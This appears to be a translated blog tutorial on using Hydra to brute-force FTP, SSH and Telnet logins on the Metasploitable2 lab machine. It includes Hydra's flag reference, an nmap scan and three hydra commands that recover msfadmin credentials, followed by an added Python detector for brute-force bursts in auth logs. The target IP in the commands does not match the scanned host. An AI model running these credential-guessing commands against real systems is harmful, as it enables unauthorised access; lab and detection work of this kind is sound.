A Metasploitable2 internal-network penetration walkthrough: brute-forcing ports 21, 22 and 23

Published: 2025-12-09 11:51:59

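Hydra is a very powerful, open-source brute-force tool developed by the well-known hacker group THC. It is a proof-of-concept tool whose main purpose is to show security researchers how authenticated access to a system can be obtained remotely.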

The tool currently supports brute-forcing the following protocols:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

For HTTP, POP3, IMAP and SMTP, several login mechanisms are supported, such as plain and MD5 digest.

Reference: "Usage of the Hydra brute-force tool", byc6352's column, CSDN blog

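Common hydra parameters:
-R: resume cracking from where the previous session stopped
-S: uppercase; connect using SSL
-s <PORT>: lowercase; use this to specify a non-default port
-l <LOGIN>: specify the user to crack; targets one particular user
-L <FILE>: specify a username dictionary
-p <PASS>: lowercase; specify a single password to try; rarely used, a password dictionary is the usual choice
-P <FILE>: uppercase; specify a password dictionary
-e <ns>: optional; n: try an empty password, s: try the specified user name as the password
-C <FILE>: use a colon-separated format such as "login:password" instead of the -L/-P parameters
-M <FILE>: specify a target list file, one target per line
-o <FILE>: specify the output file for results
-f: when used with -M, stop cracking once the first login/password pair is found
-t <TASKS>: number of threads run in parallel, default 16
-w <TIME>: maximum timeout in seconds, default 30s
-v / -V: show detailed progress
server: target IP
service: the service name; supported services and protocols include: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp and so on
OPT: optional items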

An nmap scan of the Metasploitable2 target shows that ports 21, 22 and 23 are open; this article uses these three ports for a detailed worked example.

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:11 CST
Nmap scan report for 192.168.43.46
Host is up (0.00032s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

The following command brute-forces the FTP service and finds that the login name and password are both msfadmin:

hydra -L username.txt -P password.txt 192.168.1.1 ftp

The following command brute-forces the SSH service and finds that the login name and password are both msfadmin:

hydra -l msfadmin -p msfadmin 192.168.1.1 ssh

The following command brute-forces the Telnet service and finds that the login name and password are both msfadmin:

hydra -l msfadmin -p msfadmin 192.168.1.1 telnet
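
Seen from the target host, the Hydra runs above appear as bursts of failed logins from a single source across FTP, SSH and Telnet. The Python code below is an added example, not part of the original post: it scans auth.log-style lines for such bursts. The log line formats, the sample lines and addresses, and the names parse_failures and detect_bruteforce are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed auth.log line formats for sshd, login(1) behind telnetd, and vsftpd via PAM.
PATTERNS = {
    "ssh": re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"),
    "telnet": re.compile(r"login\[\d+\]: FAILED LOGIN \(\d+\) on '[^']*' from '(?P<ip>[\d.]+)' FOR '(?P<user>[^']*)'"),
    "ftp": re.compile(r"vsftpd(?:\[\d+\])?: pam_unix\(vsftpd:auth\): authentication failure;.*ruser=(?P<user>\S*) rhost=(?P<ip>[\d.]+)"),
}

def parse_failures(lines, year=2020):
    """Yield (timestamp, service, ip, user) for every failed-login line."""
    for line in lines:
        for service, rx in PATTERNS.items():
            m = rx.search(line)
            if m:  # syslog timestamps carry no year, so the caller supplies one
                ts = datetime.strptime(f"{year} {line[:15]}", "%Y %b %d %H:%M:%S")
                yield ts, service, m["ip"], m["user"]
                break

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: summary} for sources with >= threshold failures inside one window."""
    by_ip = defaultdict(list)
    for ts, service, ip, user in parse_failures(lines):
        by_ip[ip].append((ts, service, user))
    alerts = {}
    for ip, events in by_ip.items():
        times = sorted(e[0] for e in events)
        # A burst exists if some run of `threshold` consecutive failures spans <= window.
        if any(times[i + threshold - 1] - times[i] <= window
               for i in range(len(times) - threshold + 1)):
            alerts[ip] = {"failures": len(events), "services": sorted({e[1] for e in events}),
                          "users": sorted({e[2] for e in events})}
    return alerts

# Constructed sample log (not from the page): one noisy source, one user typo.
SAMPLE = [f"Dec  7 20:15:0{i} target sshd[400{i}]: Failed password for {u} from 192.168.43.10 port 5000{i} ssh2"
          for i, u in enumerate(["root", "admin", "msfadmin", "user"])] + [
    "Dec  7 20:15:04 target sshd[4004]: Failed password for invalid user test from 192.168.43.10 port 50004 ssh2",
    "Dec  7 20:15:06 target vsftpd: pam_unix(vsftpd:auth): authentication failure; logname= uid=0 euid=0 tty=ftp ruser=msfadmin rhost=192.168.43.10",
    "Dec  7 20:15:08 target login[4100]: FAILED LOGIN (1) on 'pts/1' from '192.168.43.10' FOR 'root', Authentication failure",
    "Dec  7 20:16:30 target sshd[4200]: Failed password for alice from 192.168.43.77 port 40000 ssh2",
    "Dec  7 20:16:40 target sshd[4201]: Accepted password for alice from 192.168.43.77 port 40001 ssh2",
]

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE))
```

Hydra's default of 16 parallel tasks (-t) makes these bursts dense, so a low threshold over a short window separates them from an occasional mistyped password.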